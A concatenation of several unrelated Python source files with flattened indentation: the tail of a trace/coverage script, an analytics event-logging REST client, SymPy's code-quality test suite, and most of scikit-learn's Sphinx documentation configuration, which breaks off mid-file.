if opt == "--ignore-dir":
for s in val.split(os.pathsep):
s = os.path.expandvars(s)
# should I also call expanduser? (after all, could use $HOME)
s = s.replace("$prefix",
os.path.join(sys.prefix, "lib",
"python" + sys.version[:3]))
s = s.replace("$exec_prefix",
os.path.join(sys.exec_prefix, "lib",
"python" + sys.version[:3]))
s = os.path.normpath(s)
ignore_dirs.append(s)
continue
assert 0, "Should never get here"
if listfuncs and (count or trace):
_err_exit("cannot specify both --listfuncs and (--trace or --count)")
if not (count or trace or report or listfuncs or countcallers):
_err_exit("must specify one of --trace, --count, --report, "
"--listfuncs, or --trackcalls")
if report and no_report:
_err_exit("cannot specify both --report and --no-report")
if report and not counts_file:
_err_exit("--report requires a --file")
if no_report and len(prog_argv) == 0:
_err_exit("missing name of file to run")
# everything is ready
if report:
results = CoverageResults(infile=counts_file, outfile=counts_file)
results.write_results(missing, summary=summary, coverdir=coverdir)
else:
sys.argv = prog_argv
progname = prog_argv[0]
sys.path[0] = os.path.split(progname)[0]
t = Trace(count, trace, countfuncs=listfuncs,
countcallers=countcallers, ignoremods=ignore_modules,
ignoredirs=ignore_dirs, infile=counts_file,
outfile=counts_file, timing=timing)
try:
with open(progname) as fp:
code = compile(fp.read(), progname, 'exec')
# try to emulate __main__ namespace as much as possible
globs = {
'__file__': progname,
'__name__': '__main__',
'__package__': None,
'__cached__': None,
}
t.runctx(code, globs, globs)
except IOError, err:
_err_exit("Cannot run file %r because: %s" % (sys.argv[0], err))
except SystemExit:
pass
results = t.results()
if not no_report:
results.write_results(missing, summary=summary, coverdir=coverdir)
if __name__=='__main__':
main()
|
|
# -*- coding: utf-8 -*-
"""
"""
import json
import socket
import logging
import threading
from urlparse import urljoin
import requests
from apiaccesstoken.clientside import RequestsAccessTokenAuth
def get_log(e=None):
return logging.getLogger("{0}.{1}".format(__name__, e) if e else __name__)
# Set up by a call to Analytics.init(...):
__Analytics = None
class Analytics(object):
"""A light namespace for the REST API to stats-service.
"""
JSON_CT = {
# I accept JSON:
'Accept': 'application/json',
# I POST JSON:
'Content-Type': 'application/json',
}
ANALYTICS = '/log/event/'
EVENT = '/log/event/{}/'
def __init__(self, config={}):
"""Set up the analytics REST API service details.
:param config: a dict
E.g.::
config = {
# Don't log events, noop them instead.
"disabled": True,
"access_token": "<access token string>",
# The analytics service to connect to:
"url": "http://localhost:20080",
# Log asynchronusly and don't wait for a response.
"defer": True,
# optional dict which become "tags" in logged events. If not
# set "tags" field won't be present in logged events.
"tags": A dict of key-value pairs to include in a event log.
}
tags example::
{"mode": "prodution" | "development"}
If defer is True return letting a thread handle the POST. The
raise_for_status() will be logged and not raised.
"""
log = get_log("Analytics.init")
self.disabled = config.get("disabled", False)
self.base_uri = config.get("url", "http://localhost:20080")
self.tags = config.get("tags", {})
log.debug(
"Logging events to stats-service '{}'.".format(self.base_uri)
)
self.defer = config.get("defer", True)
self.app_node = socket.gethostname()
# once-off log analytics is disable in a call to self.log()
self._log_is_disabled = False
access_token = config.get("access_token")
if not access_token and not self.disabled:
raise ValueError("access_token us not set!")
else:
log.debug("access token set.")
self.auth = RequestsAccessTokenAuth(access_token)
@classmethod
def init(cls, config={}):
"""Set up the Analytics instance for stats() to return.
:param config: The URI of the analytics service.
If no 'uri' field is set or is empty the analytics logging will be
disabled after logging a single warning. This allows analytics to be
turned off with causing errors.
"""
global __Analytics
__Analytics = Analytics(
dict(
# Disable event logging if the uri is empty:
disabled=config.get("disabled"),
access_token=config.get("access_token"),
url=config.get("url"),
defer=config.get("defer", True),
)
)
return __Analytics
@classmethod
def stats(cls):
"""Return the configured Analytics instance set up by init()."""
assert __Analytics is not None
return __Analytics
def get_auth(self):
"""Recover the configured access auth instance."""
if not self.auth:
raise ValueError(
"No access token set! Please call set_auth() or login()."
)
return self.auth
def ping(self):
"""Recover the API Service status page.
This will raise a connection error or it will return successfully.
:returns: service status dict.
"""
log = get_log('ping')
uri = urljoin(self.base_uri, 'ping/')
log.debug("contacting '{}'".format(uri))
resp = requests.get(uri, headers=self.JSON_CT)
resp.raise_for_status()
return resp.json()
def system_startup(self):
"""Log the start of a service on a machine.
"""
tags = dict(
uid="system-{}".format(self.app_node),
ip=socket.gethostbyname(self.app_node),
hostname=self.app_node,
)
# add in extra tags if they have been specified
for key in self.tags:
tags[key] = unicode(self.tags[key])
points = [dict(
measurement='server_startup',
tags=tags,
fields=dict(
# will allow you to count() the number of startups.
# lots/<time period e.g. min,day,etc> is probably bad :)
value=1
)
)]
self.log(points)
def log(self, points):
"""Log an analytics event string with the given data.
:param points: InfluxDB points.
"""
log = get_log("Analytics.log")
if self.disabled is True:
if self._log_is_disabled is False:
log.warn("Analytics is disabled in configuration!")
self._logdisabled = True
return
uri = urljoin(self.base_uri, self.ANALYTICS)
points = json.dumps(points)
def _go(defer, uri, data):
#log.debug("sending data '{}' to '{}'".format(data, uri))
returned = ""
try:
resp = requests.post(
uri,
data=data,
headers=self.JSON_CT,
auth=self.get_auth()
)
except requests.exceptions.ConnectionError, e:
log.warn("Uable to connect to log event: {}".format(e))
else:
if resp.status_code > 399:
log.error("Log event error: {} {}".format(
resp.status_code, resp
))
else:
returned = resp.json()
return returned
if self.defer:
t = threading.Thread(target=_go, args=(self.defer, uri, points))
t.daemon = True
t.start()
else:
return _go(self.defer, uri, points)
|
|
from os import walk, sep, pardir
from os.path import split, join, abspath, exists, isfile
from glob import glob
import re
import random
import ast
from sympy.core.compatibility import PY3
# System path separator (usually slash or backslash) to be
# used with excluded files, e.g.
# exclude = set([
# "%(sep)smpmath%(sep)s" % sepd,
# ])
sepd = {"sep": sep}
# path and sympy_path
SYMPY_PATH = abspath(join(split(__file__)[0], pardir, pardir)) # go to sympy/
assert exists(SYMPY_PATH)
TOP_PATH = abspath(join(SYMPY_PATH, pardir))
BIN_PATH = join(TOP_PATH, "bin")
EXAMPLES_PATH = join(TOP_PATH, "examples")
# Error messages
message_space = "File contains trailing whitespace: %s, line %s."
message_implicit = "File contains an implicit import: %s, line %s."
message_tabs = "File contains tabs instead of spaces: %s, line %s."
message_carriage = "File contains carriage returns at end of line: %s, line %s"
message_str_raise = "File contains string exception: %s, line %s"
message_gen_raise = "File contains generic exception: %s, line %s"
message_old_raise = "File contains old-style raise statement: %s, line %s, \"%s\""
message_eof = "File does not end with a newline: %s, line %s"
message_multi_eof = "File ends with more than 1 newline: %s, line %s"
message_test_suite_def = "Function should start with 'test_' or '_': %s, line %s"
message_duplicate_test = "This is a duplicate test function: %s, line %s"
message_self_assignments = "File contains assignments to self/cls: %s, line %s."
message_func_is = "File contains '.func is': %s, line %s."
implicit_test_re = re.compile(r'^\s*(>>> )?(\.\.\. )?from .* import .*\*')
str_raise_re = re.compile(
r'^\s*(>>> )?(\.\.\. )?raise(\s+(\'|\")|\s*(\(\s*)+(\'|\"))')
gen_raise_re = re.compile(
r'^\s*(>>> )?(\.\.\. )?raise(\s+Exception|\s*(\(\s*)+Exception)')
old_raise_re = re.compile(r'^\s*(>>> )?(\.\.\. )?raise((\s*\(\s*)|\s+)\w+\s*,')
test_suite_def_re = re.compile(r'^def\s+(?!(_|test))[^(]*\(\s*\)\s*:$')
test_ok_def_re = re.compile(r'^def\s+test_.*:$')
test_file_re = re.compile(r'.*[/\\]test_.*\.py$')
func_is_re = re.compile(r'\.\s*func\s+is')
def tab_in_leading(s):
"""Returns True if there are tabs in the leading whitespace of a line,
including the whitespace of docstring code samples."""
n = len(s) - len(s.lstrip())
if not s[n:n + 3] in ['...', '>>>']:
check = s[:n]
else:
smore = s[n + 3:]
check = s[:n] + smore[:len(smore) - len(smore.lstrip())]
return not (check.expandtabs() == check)
def find_self_assignments(s):
"""Returns a list of "bad" assignments: if there are instances
of assigning to the first argument of the class method (except
for staticmethod's).
"""
t = [n for n in ast.parse(s).body if isinstance(n, ast.ClassDef)]
bad = []
for c in t:
for n in c.body:
if not isinstance(n, ast.FunctionDef):
continue
if any(d.id == 'staticmethod'
for d in n.decorator_list if isinstance(d, ast.Name)):
continue
if n.name == '__new__':
continue
if not n.args.args:
continue
if PY3:
first_arg = n.args.args[0].arg
else:
first_arg = n.args.args[0].id
for m in ast.walk(n):
if isinstance(m, ast.Assign):
for a in m.targets:
if isinstance(a, ast.Name) and a.id == first_arg:
bad.append(m)
elif (isinstance(a, ast.Tuple) and
any(q.id == first_arg for q in a.elts
if isinstance(q, ast.Name))):
bad.append(m)
return bad
def check_directory_tree(base_path, file_check, exclusions=set(), pattern="*.py"):
"""
Checks all files in the directory tree (with base_path as starting point)
with the file_check function provided, skipping files that contain
any of the strings in the set provided by exclusions.
"""
if not base_path:
return
for root, dirs, files in walk(base_path):
check_files(glob(join(root, pattern)), file_check, exclusions)
def check_files(files, file_check, exclusions=set(), pattern=None):
"""
Checks all files with the file_check function provided, skipping files
that contain any of the strings in the set provided by exclusions.
"""
if not files:
return
for fname in files:
if not exists(fname) or not isfile(fname):
continue
if any(ex in fname for ex in exclusions):
continue
if pattern is None or re.match(pattern, fname):
file_check(fname)
def test_files():
"""
This test tests all files in sympy and checks that:
o no lines contains a trailing whitespace
o no lines end with \r\n
o no line uses tabs instead of spaces
o that the file ends with a single newline
o there are no general or string exceptions
o there are no old style raise statements
o name of arg-less test suite functions start with _ or test_
o no duplicate function names that start with test_
o no assignments to self variable in class methods
o no lines contain ".func is" except in the test suite
"""
def test(fname):
if PY3:
with open(fname, "rt", encoding="utf8") as test_file:
test_this_file(fname, test_file)
else:
with open(fname, "rt") as test_file:
test_this_file(fname, test_file)
with open(fname, "rt") as test_file:
source = test_file.read()
result = find_self_assignments(source)
if result:
assert False, message_self_assignments % (fname,
result[0].lineno)
def test_this_file(fname, test_file):
line = None # to flag the case where there were no lines in file
tests = 0
test_set = set()
for idx, line in enumerate(test_file):
if test_file_re.match(fname):
if test_suite_def_re.match(line):
assert False, message_test_suite_def % (fname, idx + 1)
if test_ok_def_re.match(line):
tests += 1
test_set.add(line[3:].split('(')[0].strip())
if len(test_set) != tests:
assert False, message_duplicate_test % (fname, idx + 1)
if line.endswith(" \n") or line.endswith("\t\n"):
assert False, message_space % (fname, idx + 1)
if line.endswith("\r\n"):
assert False, message_carriage % (fname, idx + 1)
if tab_in_leading(line):
assert False, message_tabs % (fname, idx + 1)
if str_raise_re.search(line):
assert False, message_str_raise % (fname, idx + 1)
if gen_raise_re.search(line):
assert False, message_gen_raise % (fname, idx + 1)
if (implicit_test_re.search(line) and
not list(filter(lambda ex: ex in fname, import_exclude))):
assert False, message_implicit % (fname, idx + 1)
if func_is_re.search(line) and not test_file_re.search(fname):
assert False, message_func_is % (fname, idx + 1)
result = old_raise_re.search(line)
if result is not None:
assert False, message_old_raise % (
fname, idx + 1, result.group(2))
if line is not None:
if line == '\n' and idx > 0:
assert False, message_multi_eof % (fname, idx + 1)
elif not line.endswith('\n'):
# eof newline check
assert False, message_eof % (fname, idx + 1)
# Files to test at top level
top_level_files = [join(TOP_PATH, file) for file in [
"isympy.py",
"build.py",
"setup.py",
"setupegg.py",
]]
# Files to exclude from all tests
exclude = set([
"%(sep)ssympy%(sep)sparsing%(sep)sautolev%(sep)s_antlr%(sep)sautolevparser.py" % sepd,
"%(sep)ssympy%(sep)sparsing%(sep)sautolev%(sep)s_antlr%(sep)sautolevlexer.py" % sepd,
"%(sep)ssympy%(sep)sparsing%(sep)sautolev%(sep)s_antlr%(sep)sautolevlistener.py" % sepd,
"%(sep)ssympy%(sep)sparsing%(sep)slatex%(sep)s_antlr%(sep)slatexparser.py" % sepd,
"%(sep)ssympy%(sep)sparsing%(sep)slatex%(sep)s_antlr%(sep)slatexlexer.py" % sepd,
])
# Files to exclude from the implicit import test
import_exclude = set([
# glob imports are allowed in top-level __init__.py:
"%(sep)ssympy%(sep)s__init__.py" % sepd,
# these __init__.py should be fixed:
# XXX: not really, they use useful import pattern (DRY)
"%(sep)svector%(sep)s__init__.py" % sepd,
"%(sep)smechanics%(sep)s__init__.py" % sepd,
"%(sep)squantum%(sep)s__init__.py" % sepd,
"%(sep)spolys%(sep)s__init__.py" % sepd,
"%(sep)spolys%(sep)sdomains%(sep)s__init__.py" % sepd,
# interactive sympy executes ``from sympy import *``:
"%(sep)sinteractive%(sep)ssession.py" % sepd,
# isympy.py executes ``from sympy import *``:
"%(sep)sisympy.py" % sepd,
# these two are import timing tests:
"%(sep)sbin%(sep)ssympy_time.py" % sepd,
"%(sep)sbin%(sep)ssympy_time_cache.py" % sepd,
# Taken from Python stdlib:
"%(sep)sparsing%(sep)ssympy_tokenize.py" % sepd,
# this one should be fixed:
"%(sep)splotting%(sep)spygletplot%(sep)s" % sepd,
# False positive in the docstring
"%(sep)sbin%(sep)stest_external_imports.py" % sepd,
])
check_files(top_level_files, test)
check_directory_tree(BIN_PATH, test, set(["~", ".pyc", ".sh"]), "*")
check_directory_tree(SYMPY_PATH, test, exclude)
check_directory_tree(EXAMPLES_PATH, test, exclude)
def _with_space(c):
# return c with a random amount of leading space
return random.randint(0, 10)*' ' + c
def test_raise_statement_regular_expression():
candidates_ok = [
"some text # raise Exception, 'text'",
"raise ValueError('text') # raise Exception, 'text'",
"raise ValueError('text')",
"raise ValueError",
"raise ValueError('text')",
"raise ValueError('text') #,",
# Talking about an exception in a docstring
''''"""This function will raise ValueError, except when it doesn't"""''',
"raise (ValueError('text')",
]
str_candidates_fail = [
"raise 'exception'",
"raise 'Exception'",
'raise "exception"',
'raise "Exception"',
"raise 'ValueError'",
]
gen_candidates_fail = [
"raise Exception('text') # raise Exception, 'text'",
"raise Exception('text')",
"raise Exception",
"raise Exception('text')",
"raise Exception('text') #,",
"raise Exception, 'text'",
"raise Exception, 'text' # raise Exception('text')",
"raise Exception, 'text' # raise Exception, 'text'",
">>> raise Exception, 'text'",
">>> raise Exception, 'text' # raise Exception('text')",
">>> raise Exception, 'text' # raise Exception, 'text'",
]
old_candidates_fail = [
"raise Exception, 'text'",
"raise Exception, 'text' # raise Exception('text')",
"raise Exception, 'text' # raise Exception, 'text'",
">>> raise Exception, 'text'",
">>> raise Exception, 'text' # raise Exception('text')",
">>> raise Exception, 'text' # raise Exception, 'text'",
"raise ValueError, 'text'",
"raise ValueError, 'text' # raise Exception('text')",
"raise ValueError, 'text' # raise Exception, 'text'",
">>> raise ValueError, 'text'",
">>> raise ValueError, 'text' # raise Exception('text')",
">>> raise ValueError, 'text' # raise Exception, 'text'",
"raise(ValueError,",
"raise (ValueError,",
"raise( ValueError,",
"raise ( ValueError,",
"raise(ValueError ,",
"raise (ValueError ,",
"raise( ValueError ,",
"raise ( ValueError ,",
]
for c in candidates_ok:
assert str_raise_re.search(_with_space(c)) is None, c
assert gen_raise_re.search(_with_space(c)) is None, c
assert old_raise_re.search(_with_space(c)) is None, c
for c in str_candidates_fail:
assert str_raise_re.search(_with_space(c)) is not None, c
for c in gen_candidates_fail:
assert gen_raise_re.search(_with_space(c)) is not None, c
for c in old_candidates_fail:
assert old_raise_re.search(_with_space(c)) is not None, c
def test_implicit_imports_regular_expression():
candidates_ok = [
"from sympy import something",
">>> from sympy import something",
"from sympy.somewhere import something",
">>> from sympy.somewhere import something",
"import sympy",
">>> import sympy",
"import sympy.something.something",
"... import sympy",
"... import sympy.something.something",
"... from sympy import something",
"... from sympy.somewhere import something",
">> from sympy import *", # To allow 'fake' docstrings
"# from sympy import *",
"some text # from sympy import *",
]
candidates_fail = [
"from sympy import *",
">>> from sympy import *",
"from sympy.somewhere import *",
">>> from sympy.somewhere import *",
"... from sympy import *",
"... from sympy.somewhere import *",
]
for c in candidates_ok:
assert implicit_test_re.search(_with_space(c)) is None, c
for c in candidates_fail:
assert implicit_test_re.search(_with_space(c)) is not None, c
def test_test_suite_defs():
candidates_ok = [
" def foo():\n",
"def foo(arg):\n",
"def _foo():\n",
"def test_foo():\n",
]
candidates_fail = [
"def foo():\n",
"def foo() :\n",
"def foo( ):\n",
"def foo():\n",
]
for c in candidates_ok:
assert test_suite_def_re.search(c) is None, c
for c in candidates_fail:
assert test_suite_def_re.search(c) is not None, c
def test_test_duplicate_defs():
candidates_ok = [
"def foo():\ndef foo():\n",
"def test():\ndef test_():\n",
"def test_():\ndef test__():\n",
]
candidates_fail = [
"def test_():\ndef test_ ():\n",
"def test_1():\ndef test_1():\n",
]
ok = (None, 'check')
def check(file):
tests = 0
test_set = set()
for idx, line in enumerate(file.splitlines()):
if test_ok_def_re.match(line):
tests += 1
test_set.add(line[3:].split('(')[0].strip())
if len(test_set) != tests:
return False, message_duplicate_test % ('check', idx + 1)
return None, 'check'
for c in candidates_ok:
assert check(c) == ok
for c in candidates_fail:
assert check(c) != ok
def test_find_self_assignments():
candidates_ok = [
"class A(object):\n def foo(self, arg): arg = self\n",
"class A(object):\n def foo(self, arg): self.prop = arg\n",
"class A(object):\n def foo(self, arg): obj, obj2 = arg, self\n",
"class A(object):\n @classmethod\n def bar(cls, arg): arg = cls\n",
"class A(object):\n def foo(var, arg): arg = var\n",
]
candidates_fail = [
"class A(object):\n def foo(self, arg): self = arg\n",
"class A(object):\n def foo(self, arg): obj, self = arg, arg\n",
"class A(object):\n def foo(self, arg):\n if arg: self = arg",
"class A(object):\n @classmethod\n def foo(cls, arg): cls = arg\n",
"class A(object):\n def foo(var, arg): var = arg\n",
]
for c in candidates_ok:
assert find_self_assignments(c) == []
for c in candidates_fail:
assert find_self_assignments(c) != []
|
|
# -*- coding: utf-8 -*-
#
# scikit-learn documentation build configuration file, created by
# sphinx-quickstart on Fri Jan 8 09:13:42 2010.
#
# This file is execfile()d with the current directory set to its containing
# dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import warnings
import re
from datetime import datetime
from packaging.version import parse
from pathlib import Path
from io import StringIO
# If extensions (or modules to document with autodoc) are in another
# directory, add these directories to sys.path here. If the directory
# is relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
sys.path.insert(0, os.path.abspath('sphinxext'))
from github_link import make_linkcode_resolve
import sphinx_gallery
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = [
'sphinx.ext.autodoc', 'sphinx.ext.autosummary',
'numpydoc',
'sphinx.ext.linkcode', 'sphinx.ext.doctest',
'sphinx.ext.intersphinx',
'sphinx.ext.imgconverter',
'sphinx_gallery.gen_gallery',
'sphinx_issues',
'add_toctree_functions',
'sphinx-prompt',
]
# this is needed for some reason...
# see https://github.com/numpy/numpydoc/issues/69
numpydoc_class_members_toctree = False
# For maths, use mathjax by default and svg if NO_MATHJAX env variable is set
# (useful for viewing the doc offline)
if os.environ.get('NO_MATHJAX'):
extensions.append('sphinx.ext.imgmath')
imgmath_image_format = 'svg'
mathjax_path = ''
else:
extensions.append('sphinx.ext.mathjax')
mathjax_path = ('https://cdn.jsdelivr.net/npm/mathjax@3/es5/'
'tex-chtml.js')
autodoc_default_options = {
'members': True,
'inherited-members': True
}
# Add any paths that contain templates here, relative to this directory.
templates_path = ['templates']
# generate autosummary even if no references
autosummary_generate = True
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8'
# The main toctree document.
main_doc = 'contents'
# General information about the project.
project = 'scikit-learn'
copyright = (
f'2007 - {datetime.now().year}, scikit-learn developers (BSD License)'
)
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
import sklearn
parsed_version = parse(sklearn.__version__)
version = ".".join(parsed_version.base_version.split(".")[:2])
# The full version, including alpha/beta/rc tags.
# Removes post from release name
if parsed_version.is_postrelease:
release = parsed_version.base_version
else:
release = sklearn.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build', 'templates', 'includes', 'themes']
# The reST default role (used for this markup: `text`) to use for all
# documents.
default_role = 'literal'
# If true, '()' will be appended to :func: etc. cross-reference text.
add_function_parentheses = False
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
html_theme = 'scikit-learn-modern'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
html_theme_options = {'google_analytics': True,
'mathjax_path': mathjax_path}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = ['themes']
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
html_short_title = 'scikit-learn'
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
html_logo = 'logos/scikit-learn-logo-small.png'
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
html_favicon = 'logos/favicon.ico'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['images']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
html_additional_pages = {
'index': 'index.html',
'documentation': 'documentation.html'} # redirects to index
# If false, no module index is generated.
html_domain_indices = False
# If false, no index is generated.
html_use_index = False
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'scikit-learndoc'
# If true, the reST sources are included in the HTML build as _sources/name.
html_copy_source = True
# Adds variables into templates
html_context = {}
# finds latest release highlights and places it into HTML context for
# index.html
release_highlights_dir = Path("..") / "examples" / "release_highlights"
# Finds the highlight with the latest version number
latest_highlights = sorted(release_highlights_dir.glob(
"plot_release_highlights_*.py"))[-1]
latest_highlights = latest_highlights.with_suffix('').name
html_context["release_highlights"] = \
f"auto_examples/release_highlights/{latest_highlights}"
# get version from higlight name assuming highlights have the form
# plot_release_highlights_0_22_0
highlight_version = ".".join(latest_highlights.split("_")[-3:-1])
html_context["release_highlights_version"] = highlight_version
# -- Options for LaTeX output ------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
'preamble': r"""
\usepackage{amsmath}\usepackage{amsfonts}\usepackage{bm}
\usepackage{morefloats}\usepackage{enumitem} \setlistdepth{10}
\let\oldhref\href
\renewcommand{\href}[2]{\oldhref{#1}{\hbox{#2}}}
"""
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [('contents', 'user_guide.tex', 'scikit-learn user guide',
'scikit-learn developers', 'manual'), ]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
latex_logo = "logos/scikit-learn-logo.png"
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
latex_domain_indices = False
trim_doctests_flags = True
# intersphinx configuration
intersphinx_mapping = {
'python': ('https://docs.python.org/{.major}'.format(
sys.version_info), None),
'numpy': ('https://numpy.org/doc/stable', None),
'scipy': ('https://docs.scipy.org/doc/scipy/reference', None),
'matplotlib': ('https://matplotlib.org/', None),
'pandas': ('https://pandas.pydata.org/pandas-docs/stable/', None),
'joblib': ('https://joblib.readthedocs.io/en/latest/', None),
'seaborn': ('https://seaborn.pydata.org/', None),
}
v = parse(release)
if v.release is None:
raise ValueError(
'Ill-formed version: {!r}. Version should follow '
'PEP440'.format(version))
if v.is_devrelease:
binder_branch = 'main'
else:
major, minor = v.release[:2]
binder_branch = '{}.{}.X'.format(major, minor)
class SubSectionTitleOrder:
"""Sort example gallery by title of subsection.
Assumes README.txt exists for all subsections and uses the subsection with
dashes, '---', as the adornment.
"""
def __init__(self, src_dir):
self.src_dir = src_dir
self.regex = re.compile(r"^([\w ]+)\n-", re.MULTILINE)
def __repr__(self):
return '<%s>' % (self.__class__.__name__,)
def __call__(self, directory):
src_path = os.path.normpath(os.path.join(self.src_dir, directory))
# Forces Release Highlights to the top
if os.path.basename(src_path) == "release_highlights":
return "0"
readme = os.path.join(src_path, "README.txt")
try:
with open(readme, 'r') as f:
content = f.read()
except FileNotFoundError:
return directory
title_match = self.regex.search(content)
if title_match is not None:
return title_match.group(1)
return directory
sphinx_gallery_conf = {
'doc_module': 'sklearn',
'backreferences_dir': os.path.join('modules', 'generated'),
'show_memory': False,
'reference_url': {
'sklearn': None},
'examples_dirs': ['../examples'],
'gallery_dirs': ['auto_examples'],
'subsection_order': SubSectionTitleOrder('../examples'),
'binder': {
'org': 'scikit-learn',
'repo': 'scikit-learn',
'binderhub_url': 'https://mybinder.org',
'branch': binder_branch,
'dependencies': './binder/requirements.txt',
'use_jupyter_lab': True
},
# avoid generating too many cross links
'inspect_global_variables': False,
'remove_config_comments': True,
}
# The following dictionary contains the information used to create the
# thumbnails for the front page of the scikit-learn home page.
# key: first image in set
# values: (number of plot in set, height of thumbnail)
carousel_thumbs = {'sphx_glr_plot_classifier_comparison_001.png': 600}
# enable experimental module so that experimental estimators can be
# discovered properly by sphinx
from sklearn.experimental import enable_iterative_imputer # noqa
from sklearn.experimental import enable_halving_search_cv # noqa
def make_carousel_thumbs(app, exception):
"""produces the final resized carousel images"""
if exception is not None:
return
print('Preparing carousel images')
image_dir = os.path.join(app.builder.outdir, '_images')
for glr_plot, max_width in carousel_thumbs.items():
image = os.path.join(image_dir, glr_plot)
if os.path.exists(image):
c_thumb = os.path.join(image_dir, glr_plot[:-4] + '_carousel.png')
sphinx_gallery.gen_rst.scale_image(image, c_thumb, max_width, 190)
def filter_search_index(app, exception):
if exception is not None:
return
# searchindex only exist when generating html
if app.builder.name != 'html':
return
print('Removing methods from search index')
searchindex_path = os.path.join(app.builder.outdir, 'searchindex.js')
with open(searchindex_path, 'r') as f:
searchindex_text = f.read()
searchindex_text = re.sub(r'{__init__.+?}', '{}', searchindex_text)
searchindex_text = re.sub(r'{__call__.+?}', '{}', searchindex_text)
with open(searchindex_path, 'w') as f:
f.write(searchindex_text)
def generate_min_dependency_table(app):
"""Generate min dependency table for docs."""
from sklearn._min_dependencies import dependent_packages
# get length of header
package_header_len = max(len(package)
for package in dependent_packages) + 4
version_header_len = len('Minimum Version') + 4
tags_header_len = max(len(tags)
for _, tags in dependent_packages.values()) + 4
output = StringIO()
output.write(' '.join(['=' * package_header_len,
'=' * version_header_len,
'=' * tags_header_len]))
output.write('\n')
dependency_title = "Dependency"
version_title = "Minimum Version"
tags_title = "Purpose"
output.write(f'{dependency_title:<{package_header_len}} '
f'{version_title:<{version_header_len}} '
f'{tags_title}\n')
output.write(' '.join(['=' * package_header_len,
'=' * version_header_len,
'=' * tags_header_len]))
output.write('\n')
for package, (version, tags) in dependent_packages.items():
output.write(f'{package:<{package_header_len}} '
f'{version:<{version_header_len}} '
f'{tags}\n')
output.write(' '.join(['=' * package_header_len,
'=' * version_header_len,
'=' * tags_header_len]))
output.write('\n')
output = output.getvalue()
with (Path('.') / 'min_dependency_table.rst').open('w') as f:
f.write(output)
def generate_min_dependency_substitutions(app):
"""Generate min dependency substitutions for docs."""
from sklearn._min_dependencies import dependent_packages
output = StringIO()
for package, (version, _) in dependent_packages.items():
package = package.capitalize()
output.write(f'.. |{package}MinVersion| replace:: {version}')
output.write('\n')
output = output.getvalue()
with (Path('.') / 'min_dependency_substitutions.rst').open('w') as f:
f.write(output)
# Config for sphinx_issues
# we use the issues path for PRs since the issues URL will forward
issues_github_path = 'scikit-learn/scikit-learn'
# Hack to get kwargs to appear in docstring #18434
# TODO: Remove when https://github.com/sphinx-doc/sphinx/pull/8234 gets
# merged
from sphinx.util import inspect # noqa
from sphinx.ext.autodoc import ClassDocumenter # noqa
class PatchedClassDocumenter(ClassDocumenter):
def _get_signature(self):
old_signature = inspect.signature
def patch_signature(subject, bound_method=False, follow_wrapped=True):
# changes the default of follow_wrapped to True
return old_signature(subject, bound_method=bound_method,
follow_wrapped=follow_wrapped)
inspect.signature = patch_signature
result = super()._get_signature()
inspect.signature = old_signature
return result
def setup(app):
app.registry.documenters['class'] = PatchedClassDocumenter
app.connect('builder-inited', generate_min_dependency_table)
app.connect('builder-inited', generate_min_dependency_substitutions)
# to hide/show the prompt in code examples:
app.connect('build-finished', make_carousel_thumbs)
app.connect('build-finished', filter_search_index)
# The following is used by sphinx.ext.linkcode to provide links to github
linkcode_resolve = make_linkcode_resolve('sklearn',
'https://github.com/scikit-learn/'
'scikit-learn/blob/{revision}/'
'{package}/{path}#L{lineno}')
warnings.filterwarnings("ignore", category=UserWarning,
message='Matplotlib is currently using agg, which is a'
' non-GUI backend, so cannot show the figure.')
# maps functions with a class name that is indistinguishable when case is
# ignore to another filename
autosummary_filename_map = {
"sklearn.cluster.dbscan": "dbscan-function",
